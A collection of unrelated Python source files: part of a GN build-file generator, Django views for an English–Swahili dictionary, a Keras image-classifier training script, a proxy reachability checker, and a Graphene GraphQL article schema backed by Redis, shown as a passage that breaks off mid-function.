        ninja_lines.append('build %s: alink_thin %s' % (
            library_to_a(library),
            ' '.join([src_to_obj(src_file) for src_file in settings['sources']])))
        ninja_lines.append(' arflags = %s' % ' '.join(arflags))
        ninja_lines.append(' libflags = %s' % ' '.join(libflags))

    for executable, settings in executables.items():
        for src_file in settings['sources']:
            build_source(src_file, settings)
        ninja_lines.extend([
            'build %s%s: link %s | %s' % (
                executable, executable_ext,
                ' '.join([src_to_obj(src_file) for src_file in settings['sources']]),
                ' '.join([library_to_a(library) for library in settings['libs']])),
            ' ldflags = %s' % ' '.join(ldflags),
            ' solibs = %s' % ' '.join(solibs),
            ' libs = %s' % ' '.join(
                [library_to_a(library) for library in settings['libs']]),
        ])

    ninja_lines.append('')  # Make sure the file ends with a newline.

    with open(path, 'w') as f:
        f.write('\n'.join(ninja_header_lines))
        f.write(ninja_template)
        f.write('\n'.join(ninja_lines))

    # Depfile: regenerate build.ninja whenever gen.py or the template change.
    with open(path + '.d', 'w') as f:
        f.write('build.ninja: ' +
                os.path.relpath(os.path.join(SCRIPT_DIR, 'gen.py'),
                                os.path.dirname(path)) + ' ' +
                os.path.relpath(template_filename, os.path.dirname(path)) + '\n')
def WriteGNNinja(path, platform, host, options):
    """Assemble toolchain, flags, and source lists, then emit build.ninja.

    Args:
      path: output path for the generated build.ninja.
      platform: target Platform (selects flags and platform sources).
      host: host Platform, forwarded to WriteGenericNinja.
      options: parsed command-line options (debug, no_strip, use_lto,
          use_icf are read here).
    """
    # Toolchain selection; each binary is overridable via environment vars.
    if platform.is_msvc():
        cc = os.environ.get('CC', 'cl.exe')
        cxx = os.environ.get('CXX', 'cl.exe')
        ld = os.environ.get('LD', 'link.exe')
        ar = os.environ.get('AR', 'lib.exe')
    elif platform.is_aix():
        cc = os.environ.get('CC', 'gcc')
        cxx = os.environ.get('CXX', 'c++')
        ld = os.environ.get('LD', cxx)
        ar = os.environ.get('AR', 'ar -X64')
    else:
        cc = os.environ.get('CC', 'cc')
        cxx = os.environ.get('CXX', 'c++')
        ld = cxx
        ar = os.environ.get('AR', 'ar')

    # Seed the flag lists from the conventional environment variables.
    cflags = os.environ.get('CFLAGS', '').split()
    cflags_cc = os.environ.get('CXXFLAGS', '').split()
    arflags = os.environ.get('ARFLAGS', '').split()
    ldflags = os.environ.get('LDFLAGS', '').split()
    libflags = os.environ.get('LIBFLAGS', '').split()
    include_dirs = [REPO_ROOT, os.path.abspath(os.path.dirname(path))]
    libs = []

    # --- Flags for gcc/clang-style toolchains -------------------------------
    if not platform.is_msvc():
        if options.debug:
            cflags.extend(['-O0', '-g'])
        else:
            cflags.append('-DNDEBUG')
            cflags.append('-O3')
            if options.no_strip:
                cflags.append('-g')
            ldflags.append('-O3')
            # Use -fdata-sections and -ffunction-sections to place each function
            # or data item into its own section so --gc-sections can eliminate any
            # unused functions and data items.
            cflags.extend(['-fdata-sections', '-ffunction-sections'])
            ldflags.extend(['-fdata-sections', '-ffunction-sections'])
            if platform.is_darwin():
                ldflags.append('-Wl,-dead_strip')
            elif not platform.is_aix():
                # Garbage collection is done by default on aix.
                ldflags.append('-Wl,--gc-sections')
            # Omit all symbol information from the output file.
            # NOTE(review): optparse store_true options default to None, so
            # 'is None' means "--no-strip not passed" (strip by default).
            if options.no_strip is None:
                if platform.is_darwin():
                    ldflags.append('-Wl,-S')
                elif platform.is_aix():
                    ldflags.append('-Wl,-s')
                else:
                    ldflags.append('-Wl,-strip-all')
            # Enable identical code-folding.
            if options.use_icf and not platform.is_darwin():
                ldflags.append('-Wl,--icf=all')
        cflags.extend([
            '-D_FILE_OFFSET_BITS=64',
            '-D__STDC_CONSTANT_MACROS', '-D__STDC_FORMAT_MACROS',
            '-pthread',
            '-pipe',
            '-fno-exceptions',
            '-fno-rtti',
            '-fdiagnostics-color',
        ])
        cflags_cc.extend(['-std=c++14', '-Wno-narrowing'])
        if platform.is_linux():
            ldflags.extend([
                '-static-libstdc++',
                '-Wl,--as-needed',
            ])
            # This is needed by libc++.
            libs.extend(['-ldl', '-lrt'])
        elif platform.is_darwin():
            min_mac_version_flag = '-mmacosx-version-min=10.9'
            cflags.append(min_mac_version_flag)
            ldflags.append(min_mac_version_flag)
        elif platform.is_aix():
            cflags_cc.append('-maix64')
            ldflags.append('-maix64')
        if platform.is_posix() and not platform.is_darwin():
            ldflags.append('-pthread')
        if options.use_lto:
            cflags.extend(['-flto', '-fwhole-program-vtables'])
            ldflags.extend(['-flto', '-fwhole-program-vtables'])
    # --- Flags for MSVC -----------------------------------------------------
    elif platform.is_msvc():
        if not options.debug:
            cflags.extend(['/O2', '/DNDEBUG', '/GL'])
            libflags.extend(['/LTCG'])
            ldflags.extend(['/LTCG', '/OPT:REF', '/OPT:ICF'])
        cflags.extend([
            '/DNOMINMAX',
            '/DUNICODE',
            '/DWIN32_LEAN_AND_MEAN',
            '/DWINVER=0x0A00',
            '/D_CRT_SECURE_NO_DEPRECATE',
            '/D_SCL_SECURE_NO_DEPRECATE',
            '/D_UNICODE',
            '/D_WIN32_WINNT=0x0A00',
            '/FS',
            '/W4',
            '/WX',
            '/Zi',
            '/wd4099',
            '/wd4100',
            '/wd4127',
            '/wd4244',
            '/wd4267',
            '/wd4505',
            '/wd4838',
            '/wd4996',
        ])
        cflags_cc.extend([
            '/GR-',
            '/D_HAS_EXCEPTIONS=0',
        ])
        target_arch = windows_target_build_arch()
        if target_arch == 'x64':
            ldflags.extend(['/DEBUG', '/MACHINE:x64'])
        else:
            ldflags.extend(['/DEBUG', '/MACHINE:x86'])

    # --- Static library source lists ----------------------------------------
    static_libraries = {
        'base': {'sources': [
            'base/callback_internal.cc',
            'base/command_line.cc',
            'base/environment.cc',
            'base/files/file.cc',
            'base/files/file_enumerator.cc',
            'base/files/file_path.cc',
            'base/files/file_path_constants.cc',
            'base/files/file_util.cc',
            'base/files/scoped_file.cc',
            'base/files/scoped_temp_dir.cc',
            'base/json/json_parser.cc',
            'base/json/json_reader.cc',
            'base/json/json_writer.cc',
            'base/json/string_escape.cc',
            'base/logging.cc',
            'base/md5.cc',
            'base/memory/ref_counted.cc',
            'base/memory/weak_ptr.cc',
            'base/sha1.cc',
            'base/strings/string_number_conversions.cc',
            'base/strings/string_piece.cc',
            'base/strings/string_split.cc',
            'base/strings/string_util.cc',
            'base/strings/string_util_constants.cc',
            'base/strings/stringprintf.cc',
            'base/strings/utf_string_conversion_utils.cc',
            'base/strings/utf_string_conversions.cc',
            'base/third_party/icu/icu_utf.cc',
            'base/timer/elapsed_timer.cc',
            'base/value_iterators.cc',
            'base/values.cc',
        ], 'tool': 'cxx', 'include_dirs': []},
        'gn_lib': {'sources': [
            'tools/gn/action_target_generator.cc',
            'tools/gn/action_values.cc',
            'tools/gn/analyzer.cc',
            'tools/gn/args.cc',
            'tools/gn/binary_target_generator.cc',
            'tools/gn/builder.cc',
            'tools/gn/builder_record.cc',
            'tools/gn/build_settings.cc',
            'tools/gn/bundle_data.cc',
            'tools/gn/bundle_data_target_generator.cc',
            'tools/gn/bundle_file_rule.cc',
            'tools/gn/c_include_iterator.cc',
            'tools/gn/command_analyze.cc',
            'tools/gn/command_args.cc',
            'tools/gn/command_check.cc',
            'tools/gn/command_clean.cc',
            'tools/gn/command_desc.cc',
            'tools/gn/command_format.cc',
            'tools/gn/command_gen.cc',
            'tools/gn/command_help.cc',
            'tools/gn/command_meta.cc',
            'tools/gn/command_ls.cc',
            'tools/gn/command_path.cc',
            'tools/gn/command_refs.cc',
            'tools/gn/commands.cc',
            'tools/gn/compile_commands_writer.cc',
            'tools/gn/config.cc',
            'tools/gn/config_values.cc',
            'tools/gn/config_values_extractors.cc',
            'tools/gn/config_values_generator.cc',
            'tools/gn/copy_target_generator.cc',
            'tools/gn/create_bundle_target_generator.cc',
            'tools/gn/deps_iterator.cc',
            'tools/gn/desc_builder.cc',
            'tools/gn/eclipse_writer.cc',
            'tools/gn/err.cc',
            'tools/gn/escape.cc',
            'tools/gn/exec_process.cc',
            'tools/gn/filesystem_utils.cc',
            'tools/gn/function_exec_script.cc',
            'tools/gn/function_foreach.cc',
            'tools/gn/function_forward_variables_from.cc',
            'tools/gn/function_get_label_info.cc',
            'tools/gn/function_get_path_info.cc',
            'tools/gn/function_get_target_outputs.cc',
            'tools/gn/function_mark_used.cc',
            'tools/gn/function_mark_used_from.cc',
            'tools/gn/function_process_file_template.cc',
            'tools/gn/function_read_file.cc',
            'tools/gn/function_rebase_path.cc',
            'tools/gn/functions.cc',
            'tools/gn/function_set_defaults.cc',
            'tools/gn/function_set_default_toolchain.cc',
            'tools/gn/functions_target.cc',
            'tools/gn/function_template.cc',
            'tools/gn/function_toolchain.cc',
            'tools/gn/function_write_file.cc',
            'tools/gn/generated_file_target_generator.cc',
            'tools/gn/group_target_generator.cc',
            'tools/gn/header_checker.cc',
            'tools/gn/import_manager.cc',
            'tools/gn/inherited_libraries.cc',
            'tools/gn/input_conversion.cc',
            'tools/gn/input_file.cc',
            'tools/gn/input_file_manager.cc',
            'tools/gn/item.cc',
            'tools/gn/json_project_writer.cc',
            'tools/gn/label.cc',
            'tools/gn/label_pattern.cc',
            'tools/gn/lib_file.cc',
            'tools/gn/loader.cc',
            'tools/gn/location.cc',
            'tools/gn/metadata.cc',
            'tools/gn/metadata_walk.cc',
            'tools/gn/ninja_action_target_writer.cc',
            'tools/gn/ninja_binary_target_writer.cc',
            'tools/gn/ninja_build_writer.cc',
            'tools/gn/ninja_bundle_data_target_writer.cc',
            'tools/gn/ninja_copy_target_writer.cc',
            'tools/gn/ninja_create_bundle_target_writer.cc',
            'tools/gn/ninja_generated_file_target_writer.cc',
            'tools/gn/ninja_group_target_writer.cc',
            'tools/gn/ninja_target_command_util.cc',
            'tools/gn/ninja_target_writer.cc',
            'tools/gn/ninja_toolchain_writer.cc',
            'tools/gn/ninja_utils.cc',
            'tools/gn/ninja_writer.cc',
            'tools/gn/operators.cc',
            'tools/gn/output_conversion.cc',
            'tools/gn/output_file.cc',
            'tools/gn/parse_node_value_adapter.cc',
            'tools/gn/parser.cc',
            'tools/gn/parse_tree.cc',
            'tools/gn/path_output.cc',
            'tools/gn/pattern.cc',
            'tools/gn/pool.cc',
            'tools/gn/qt_creator_writer.cc',
            'tools/gn/runtime_deps.cc',
            'tools/gn/scheduler.cc',
            'tools/gn/scope.cc',
            'tools/gn/scope_per_file_provider.cc',
            'tools/gn/settings.cc',
            'tools/gn/setup.cc',
            'tools/gn/source_dir.cc',
            'tools/gn/source_file.cc',
            'tools/gn/source_file_type.cc',
            'tools/gn/standard_out.cc',
            'tools/gn/string_utils.cc',
            'tools/gn/substitution_list.cc',
            'tools/gn/substitution_pattern.cc',
            'tools/gn/substitution_type.cc',
            'tools/gn/substitution_writer.cc',
            'tools/gn/switches.cc',
            'tools/gn/target.cc',
            'tools/gn/target_generator.cc',
            'tools/gn/template.cc',
            'tools/gn/token.cc',
            'tools/gn/tokenizer.cc',
            'tools/gn/tool.cc',
            'tools/gn/toolchain.cc',
            'tools/gn/trace.cc',
            'tools/gn/value.cc',
            'tools/gn/value_extractors.cc',
            'tools/gn/variables.cc',
            'tools/gn/visibility.cc',
            'tools/gn/visual_studio_utils.cc',
            'tools/gn/visual_studio_writer.cc',
            'tools/gn/xcode_object.cc',
            'tools/gn/xcode_writer.cc',
            'tools/gn/xml_element_writer.cc',
            'util/exe_path.cc',
            'util/msg_loop.cc',
            'util/semaphore.cc',
            'util/sys_info.cc',
            'util/ticks.cc',
            'util/worker_pool.cc',
        ], 'tool': 'cxx', 'include_dirs': []},
    }

    # --- Executable targets and their sources -------------------------------
    executables = {
        'gn': {'sources': [ 'tools/gn/gn_main.cc' ],
               'tool': 'cxx', 'include_dirs': [], 'libs': []},
        'gn_unittests': { 'sources': [
            'tools/gn/action_target_generator_unittest.cc',
            'tools/gn/analyzer_unittest.cc',
            'tools/gn/args_unittest.cc',
            'tools/gn/builder_unittest.cc',
            'tools/gn/c_include_iterator_unittest.cc',
            'tools/gn/command_format_unittest.cc',
            'tools/gn/compile_commands_writer_unittest.cc',
            'tools/gn/config_unittest.cc',
            'tools/gn/config_values_extractors_unittest.cc',
            'tools/gn/escape_unittest.cc',
            'tools/gn/exec_process_unittest.cc',
            'tools/gn/filesystem_utils_unittest.cc',
            'tools/gn/function_foreach_unittest.cc',
            'tools/gn/function_forward_variables_from_unittest.cc',
            'tools/gn/function_get_label_info_unittest.cc',
            'tools/gn/function_get_path_info_unittest.cc',
            'tools/gn/function_get_target_outputs_unittest.cc',
            'tools/gn/function_process_file_template_unittest.cc',
            'tools/gn/function_rebase_path_unittest.cc',
            'tools/gn/function_template_unittest.cc',
            'tools/gn/function_toolchain_unittest.cc',
            'tools/gn/function_write_file_unittest.cc',
            'tools/gn/functions_target_unittest.cc',
            'tools/gn/functions_unittest.cc',
            'tools/gn/header_checker_unittest.cc',
            'tools/gn/inherited_libraries_unittest.cc',
            'tools/gn/input_conversion_unittest.cc',
            'tools/gn/label_pattern_unittest.cc',
            'tools/gn/label_unittest.cc',
            'tools/gn/loader_unittest.cc',
            'tools/gn/metadata_unittest.cc',
            'tools/gn/metadata_walk_unittest.cc',
            'tools/gn/ninja_action_target_writer_unittest.cc',
            'tools/gn/ninja_binary_target_writer_unittest.cc',
            'tools/gn/ninja_build_writer_unittest.cc',
            'tools/gn/ninja_bundle_data_target_writer_unittest.cc',
            'tools/gn/ninja_copy_target_writer_unittest.cc',
            'tools/gn/ninja_create_bundle_target_writer_unittest.cc',
            'tools/gn/ninja_generated_file_target_writer_unittest.cc',
            'tools/gn/ninja_group_target_writer_unittest.cc',
            'tools/gn/ninja_target_writer_unittest.cc',
            'tools/gn/ninja_toolchain_writer_unittest.cc',
            'tools/gn/operators_unittest.cc',
            'tools/gn/output_conversion_unittest.cc',
            'tools/gn/parse_tree_unittest.cc',
            'tools/gn/parser_unittest.cc',
            'tools/gn/path_output_unittest.cc',
            'tools/gn/pattern_unittest.cc',
            'tools/gn/runtime_deps_unittest.cc',
            'tools/gn/scope_per_file_provider_unittest.cc',
            'tools/gn/scope_unittest.cc',
            'tools/gn/setup_unittest.cc',
            'tools/gn/source_dir_unittest.cc',
            'tools/gn/source_file_unittest.cc',
            'tools/gn/string_utils_unittest.cc',
            'tools/gn/substitution_pattern_unittest.cc',
            'tools/gn/substitution_writer_unittest.cc',
            'tools/gn/target_unittest.cc',
            'tools/gn/template_unittest.cc',
            'tools/gn/test_with_scheduler.cc',
            'tools/gn/test_with_scope.cc',
            'tools/gn/tokenizer_unittest.cc',
            'tools/gn/unique_vector_unittest.cc',
            'tools/gn/value_unittest.cc',
            'tools/gn/visibility_unittest.cc',
            'tools/gn/visual_studio_utils_unittest.cc',
            'tools/gn/visual_studio_writer_unittest.cc',
            'tools/gn/xcode_object_unittest.cc',
            'tools/gn/xml_element_writer_unittest.cc',
            'util/test/gn_test.cc',
        ], 'tool': 'cxx', 'include_dirs': [], 'libs': []},
    }

    # --- Platform-specific sources and system libraries ---------------------
    if platform.is_posix():
        static_libraries['base']['sources'].extend([
            'base/files/file_enumerator_posix.cc',
            'base/files/file_posix.cc',
            'base/files/file_util_posix.cc',
            'base/posix/file_descriptor_shuffle.cc',
            'base/posix/safe_strerror.cc',
            'base/strings/string16.cc',
        ])

    if platform.is_windows():
        static_libraries['base']['sources'].extend([
            'base/files/file_enumerator_win.cc',
            'base/files/file_util_win.cc',
            'base/files/file_win.cc',
            'base/win/registry.cc',
            'base/win/scoped_handle.cc',
            'base/win/scoped_process_information.cc',
        ])
        libs.extend([
            'advapi32.lib',
            'dbghelp.lib',
            'kernel32.lib',
            'ole32.lib',
            'shell32.lib',
            'user32.lib',
            'userenv.lib',
            'version.lib',
            'winmm.lib',
            'ws2_32.lib',
            'Shlwapi.lib',
        ])

    # we just build static libraries that GN needs
    executables['gn']['libs'].extend(static_libraries.keys())
    executables['gn_unittests']['libs'].extend(static_libraries.keys())

    WriteGenericNinja(path, static_libraries, executables, cc, cxx, ar, ld,
                      platform, host, options, cflags, cflags_cc, arflags,
                      ldflags, libflags, include_dirs, libs)
if __name__ == '__main__':
    # Strip the program name and forward the remaining args to main().
    sys.exit(main(sys.argv[1:]))
|
from django import forms
from django.http import JsonResponse, HttpResponseRedirect
from django.shortcuts import render
from swahiliapiapp.models import English, Swahili
class SearchForm(forms.Form):
    """Single-field search form shared by the EN->SW and SW->EN pages."""
    searchterm = forms.CharField(label="", widget=forms.TextInput(attrs={'placeholder': 'Enter search term here'}))
def index(request):
    """Landing page: show the search form, or redirect a POSTed search.

    GET renders an empty form; a valid POST redirects to the
    English->Swahili lookup URL for the (lowercased) search term.
    """
    if request.method == "GET":
        return render(request, "swahiliapiapp/index.html", {'words': [], 'form': SearchForm()})
    f = SearchForm(request.POST)
    if f.is_valid():
        searchterm = f.cleaned_data["searchterm"].lower()
        return HttpResponseRedirect(f'/en-sw/{searchterm}')
    # Bug fix: the invalid-form branch used to `pass`, making the view
    # return None and raise a 500. Re-render the bound form with its errors.
    return render(request, "swahiliapiapp/index.html", {'words': [], 'form': f})
def english_swahili(request, searchterm):
    """Render English->Swahili dictionary matches for *searchterm*."""
    matches = English.objects.filter(english_word=searchterm)
    context = {'words': matches, 'form': SearchForm()}
    return render(request, "swahiliapiapp/index.html", context)
def swahili_english(request, searchterm):
    """Render Swahili->English dictionary matches for *searchterm*."""
    matches = Swahili.objects.filter(swahili_word=searchterm)
    context = {'words': matches, 'form': SearchForm()}
    return render(request, "swahiliapiapp/sw-en.html", context)
|
from keras.models import Sequential, load_model
from keras.layers import Conv2D, Dropout, BatchNormalization, MaxPooling2D,Dense, Activation, Flatten
from keras.optimizers import Adam
from keras.utils import to_categorical
from keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping
import os
import glob
import cv2
import numpy as np
from keras.preprocessing.image import load_img
# Class names are the sub-directory names of the training set.
list_classes = os.listdir("../data/train")
# Input images are resized to 150x150 RGB.
image_shape = (150,150,3)
# Number of output classes; presumably equals len(list_classes) -- TODO confirm.
num_classes = 6
def load_data(data_path):
    """Load all <class>/<image>.jpg files under *data_path*.

    Returns:
        (X, Y): X is an array of images normalized to [-1, 1];
        Y is the matching array of one-hot class labels.
    """
    X = []
    Y = []
    # Bug fix: os.listdir order is filesystem-dependent, so the
    # class -> label-index mapping could differ between the train/val/test
    # directories. Sorting makes the mapping deterministic and consistent.
    list_classes = sorted(os.listdir(data_path))
    n_classes = len(list_classes)
    for label_index, class_name in enumerate(list_classes):
        list_img_paths = glob.glob(os.path.join(data_path, class_name, "*.jpg"))
        for img_path in list_img_paths:
            img = cv2.imread(img_path)
            if img is None:
                # Skip unreadable/corrupt files instead of crashing in resize.
                continue
            img = cv2.resize(img, (image_shape[0], image_shape[1]))
            # Scale pixel values from [0, 255] to [-1, 1].
            X.append(np.array((img - 127.5) / 127.5))
            Y.append(to_categorical(label_index, n_classes))
    return np.array(X), np.array(Y)
def classification_model(input_shape, num_classes):
    """Build the CNN classifier.

    Five conv / max-pool / batch-norm stages followed by a dense head with
    dropout and a softmax output over *num_classes* classes.
    """
    layers = [
        Conv2D(filters=8, kernel_size=(3, 3), padding='same',
               activation='relu', input_shape=input_shape),
        MaxPooling2D(pool_size=(2, 2), strides=(2, 2)),
        BatchNormalization(),
        Conv2D(filters=16, kernel_size=(3, 3), padding='same', activation='relu'),
        MaxPooling2D(pool_size=(2, 2), strides=(2, 2)),
        BatchNormalization(),
        Conv2D(filters=32, kernel_size=(3, 3), padding='same', activation='relu'),
        MaxPooling2D(pool_size=(2, 2), strides=(2, 2)),
        BatchNormalization(),
        Conv2D(filters=64, kernel_size=(3, 3), padding='same', activation='relu'),
        MaxPooling2D(pool_size=(3, 3), padding='same'),
        BatchNormalization(),
        Conv2D(filters=128, kernel_size=(3, 3), padding='same', activation='relu'),
        MaxPooling2D(pool_size=(3, 3), padding='same'),
        BatchNormalization(),
        Flatten(),
        Dense(500, activation='relu'),
        Dropout(0.5),
        Dense(num_classes, activation='softmax'),
    ]
    return Sequential(layers)
def train(epochs= 500, batch_size = 16):
    """Train the classifier, checkpointing best-val-accuracy weights.

    Creates a fresh numbered subdirectory under checkpoint/ and logs/ for
    this run, trains with early stopping, and saves the final model.
    """
    model = classification_model(input_shape=image_shape, num_classes=num_classes)
    optimizer = Adam(learning_rate=0.001)
    model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics = ['accuracy'])
    trainX, trainy = load_data('../data/train')
    valX, valy = load_data('../data/val')
    # New run directory: one past the number of existing subdirectories.
    # exist_ok=False so a naming collision fails loudly rather than mixing runs.
    current_checkpoint_subdir = os.listdir('checkpoint')
    new_checkpoint_subdir = os.path.join("checkpoint", str(len(current_checkpoint_subdir) + 1))
    os.makedirs(new_checkpoint_subdir, exist_ok=False)
    current_log_subdir = os.listdir("logs")
    new_log_subdir = os.path.join("logs", str(len(current_log_subdir) + 1))
    os.makedirs(new_log_subdir, exist_ok=False)
    tensorboard = TensorBoard(log_dir=new_log_subdir)
    # Stop when validation accuracy has not improved for 10 epochs.
    early_stopper = EarlyStopping(monitor='val_accuracy', mode='max', patience=10)
    # Keep only the best checkpoint, named by epoch and val accuracy.
    checkpointer = ModelCheckpoint(filepath=os.path.join(new_checkpoint_subdir, "{epoch:03d}-{val_accuracy:.3f}.hdf5"),
                                   monitor='val_accuracy', mode='max', verbose=1,
                                   save_best_only=True)
    model.fit(trainX, trainy, epochs=epochs, batch_size=batch_size, validation_data=(valX, valy), callbacks=[tensorboard, early_stopper,checkpointer])
    model.save(os.path.join(new_checkpoint_subdir, "model.h5"))
def test():
    """Evaluate the saved model on the held-out test split and print metrics."""
    X_eval, y_eval = load_data("../data/test")
    saved = load_model("checkpoint/1/model.h5")
    scores = saved.evaluate(X_eval, y_eval)
    print("loss: ", scores[0])
    print("accuracy: ", scores[1])
if __name__ == "__main__":
    # Train for 30 epochs; uncomment test() to evaluate afterwards.
    train(epochs = 30)
    #test()
|
#!/usr/bin/env python2
import socket
import sys
def isproxyalive(proxy):
    """Return True if *proxy* ('host:port') accepts a TCP connection.

    Returns False for a malformed proxy string, a non-numeric port, or any
    connection failure (refused, unreachable, 10-second timeout).
    """
    host_port = proxy.split(":")
    if len(host_port) != 2:
        # Proxy must be given as host:port.
        return False
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)
    try:
        # Fixes: Python-2-only `except Exception, e` syntax replaced with a
        # form valid on Python 2.6+ and 3; catch only the expected errors
        # (socket failures and a non-integer port) instead of everything;
        # close the socket in `finally` on every path.
        s.connect((host_port[0], int(host_port[1])))
        return True
    except (socket.error, ValueError):
        return False
    finally:
        s.close()
if __name__ == '__main__':
    # Print '1' when the proxy given as argv[1] is reachable, else '0'.
    if isproxyalive(sys.argv[1]):
        sys.stdout.write('%u' % 1)
    else:
        sys.stdout.write('%u' % 0)
|
import time
import pickle
import graphene
from graphene import resolve_only_args
from graphene_django import DjangoObjectType, DjangoConnectionField
from graphql_jwt.decorators import login_required
from django_redis import get_redis_connection
from django.db import IntegrityError, transaction
from .models import Article, Likes, TagList, ArticleTag
from .utils import test_article_id, test_id, test_article, get_like, test_tag
class ArticleType(DjangoObjectType):
    """Relay-enabled GraphQL type exposing the Article model."""
    class Meta:
        model = Article
        interfaces = (graphene.relay.Node, )
class TagListType(DjangoObjectType):
    """GraphQL type exposing the TagList model (the catalog of tags)."""
    class Meta:
        model = TagList
class ArticleTagType(DjangoObjectType):
    """GraphQL type exposing the ArticleTag association model."""
    class Meta:
        model = ArticleTag
class ArticleInfoType(graphene.ObjectType):
    """Composite response: an article, its tags, and its like count."""
    body = graphene.Field(ArticleType)
    tags = graphene.List(TagListType)
    likes = graphene.Int()
class DraftList(graphene.ObjectType):
    """A draft entry; id is the Redis zset score (a creation timestamp)."""
    id = graphene.String()
    title = graphene.String()
    content = graphene.String()
class AddTag(graphene.Mutation):
    """Mutation: attach a tag to an article (author only)."""
    ok = graphene.Boolean()

    class Arguments:
        article_id = graphene.String(required=True)
        tag_id = graphene.String(required=True)

    @login_required
    def mutate(self, info, article_id, tag_id):
        user = info.context.user
        art_id = test_article_id(article_id)
        tg_id = test_id(tag_id)
        cn = get_redis_connection()
        article_redis = 'article_{}'.format(art_id)
        # Check that the article id exists.
        group_object = test_article(cn, art_id)
        # Only the author may add a tag to their own article.
        if group_object[0].posted_by.id != user.id:
            raise Exception('Only the poster can add tag')
        # Check that the tag id is valid.
        tag_object = test_tag(cn, tg_id)
        # An article may carry a given tag only once.
        if tag_object in group_object[1]:
            raise Exception('Tag has been added')
        # Both ids validated: delete the cache entry first, then update
        # MySQL, then re-sync the result back into Redis.
        cn.delete(article_redis)
        try:
            # Updating the ArticleTag table must also bump the article's
            # updated-at timestamp; the two SQL statements must be atomic,
            # hence the transaction.
            with transaction.atomic():
                # 'NO TAG' is a sentinel tag meaning "untagged"; adding it
                # removes all of the article's existing tags instead.
                if tag_object.name != 'NO TAG':
                    ArticleTag.objects.create(article_id=art_id, tag_id=tg_id)
                    pair = ArticleTag.objects.select_related('tag').filter(article_id=art_id)
                    group_object[1] = {item.tag for item in pair}
                else:
                    ArticleTag.objects.filter(article_id=art_id).delete()
                    group_object[1] = set()
                # save() auto-updates the article's modification time.
                group_object[0].save()
            cn.set(article_redis, pickle.dumps(group_object))
            cn.expire(article_redis, 60 * 30)
            ok = True
            return AddTag(ok=ok)
        except IntegrityError:
            # Duplicates were already checked above; an IntegrityError here
            # means MySQL received new data concurrently, so re-read the
            # tags and refresh the cache before failing.
            new_tags = ArticleTag.objects.select_related('tag').filter(article_id=art_id)
            group_object[1] = {item.tag for item in new_tags}
            cn.set(article_redis, pickle.dumps(group_object))
            cn.expire(article_redis, 60 * 30)
            raise Exception('Tag has been added')
class LikeArticle(graphene.Mutation):
    """Mutation: like an article (at most once per user)."""
    ok = graphene.Boolean()

    class Arguments:
        article_id = graphene.String(required=True)

    @login_required
    def mutate(self, info, article_id):
        """
        Likes are written to Redis first and synced to MySQL by a third
        party, because liking is a very frequent write operation.
        :param info:
        :param article_id:
        :return:
        """
        # In Redis the like ranking is a zset named 'article_like':
        # score = like count, member = article_id.
        # A per-article set of voters enforces one like per user:
        # set key vote_of_{article_id} member user_id
        user = info.context.user
        int_id = test_article_id(article_id)
        con = get_redis_connection()
        # First check that the article exists.
        test_article(con, int_id)
        # Dedupe check: sadd returns 1 only if the user was not present yet.
        voter_of_redis = 'voter_of_{}'.format(int_id)
        if con.sadd(voter_of_redis, user.id):
            get_like(con, int_id, vote=True)
            ok = True
            return LikeArticle(ok=ok)
        raise Exception('one article one chance to like')
class CreateArticle(graphene.Mutation):
    """Mutation: publish an article, save a draft, or publish a draft."""
    new_article = graphene.Field(ArticleType)
    ok = graphene.Boolean()

    class Arguments:
        title = graphene.String(required=True)
        content = graphene.String(required=True)
        create_draft = graphene.Boolean()
        draft_id = graphene.String()

    @login_required
    def mutate(self, info, title, content, create_draft=False, draft_id=None):
        if create_draft and draft_id:
            raise Exception('do not create and publish draft in one request')
        writer = info.context.user
        if not create_draft:
            # When publishing a draft, remove its Redis backup first.
            con = get_redis_connection()
            if draft_id is not None:
                draft_redis = 'draft_box_{}'.format(writer.id)
                done = con.zremrangebyscore(draft_redis, float(draft_id), float(draft_id))
                if not done:
                    raise Exception('invalid draft id')
            try:
                # Create the article and its likes row atomically, then
                # prime the Redis cache with (article, empty tag set).
                with transaction.atomic():
                    atc = Article(posted_by=writer, title=title, content=content)
                    atc.save()
                    Likes.objects.create(id=atc)
                article_redis = 'article_{}'.format(atc.id)
                con.set(article_redis, pickle.dumps([atc, set()]))
                con.expire(article_redis, 60*20)
                return CreateArticle(new_article=atc, ok=True)
            except IntegrityError:
                raise Exception('article already exists')
        else:
            # Save into the draft box instead of publishing.
            con = get_redis_connection()
            # One draft box (a Redis zset) per user; the score is the
            # creation timestamp and doubles as the draft id.
            draft_redis = 'draft_box_{}'.format(writer.id)
            new_id = time.mktime(time.gmtime(time.time()))
            draft = [content, title]
            # {value: score}
            con.zadd(draft_redis, {pickle.dumps(draft): new_id})
            return CreateArticle(ok=True)
class Query(graphene.ObjectType):
    """Root query: tags, single article, article ranking, and drafts."""
    Get_all_tags = graphene.List(TagListType)
    Get_article = graphene.Field(ArticleInfoType, article_id=graphene.String())
    node = graphene.relay.Node.Field()
    Get_articles = DjangoConnectionField(ArticleType, description='All the articles')
    Get_drafts = graphene.List(DraftList)

    @login_required
    def resolve_Get_drafts(self, info):
        # Drafts live in the per-user Redis zset; newest first.
        con = get_redis_connection()
        draft_redis = 'draft_box_{}'.format(info.context.user.id)
        draft_list = con.zrevrange(draft_redis, 0, -1, withscores=True)
        result = []
        for item, score in draft_list:
            pair = pickle.loads(item)
            result.append(DraftList(id=score, title=pair[1], content=pair[0]))
        return result

    @login_required
    def resolve_Get_article(self, info, article_id):
        con = get_redis_connection()
        int_id = test_article_id(article_id)
        group_object = test_article(con, int_id)
        score = get_like(con, int_id)
        return ArticleInfoType(body=group_object[0], tags=group_object[1], likes=score)

    @login_required
    @resolve_only_args
    def resolve_Get_articles(self, **kwargues):
        # 'article_like' is the sorted set ranking articles by likes:
        # score = like count, member = article_id.
        con = get_redis_connection()
        if not con.zcard('article_like'):
            # Ranking cache is cold: rebuild it (top 100) from MySQL and
            # prime the per-article cache entries at the same time.
            ranking_list = Likes.objects.select_related().order_by('num')
            score_member = {}
            for i in range(min(len(ranking_list), 100)):
                score_member[ranking_list[i].id.id] = ranking_list[i].num if ranking_list[i].num else 0
                article_id = ranking_list[i].id.id
                article_redis = '{}_{}'.format('article', article_id)
                article = Article.objects.select_related('posted_by').get(id=article_id)
                article_tags_object = article.tag_list.select_related('tag').all()
                tags_object = {obj.tag for obj in article_tags_object}
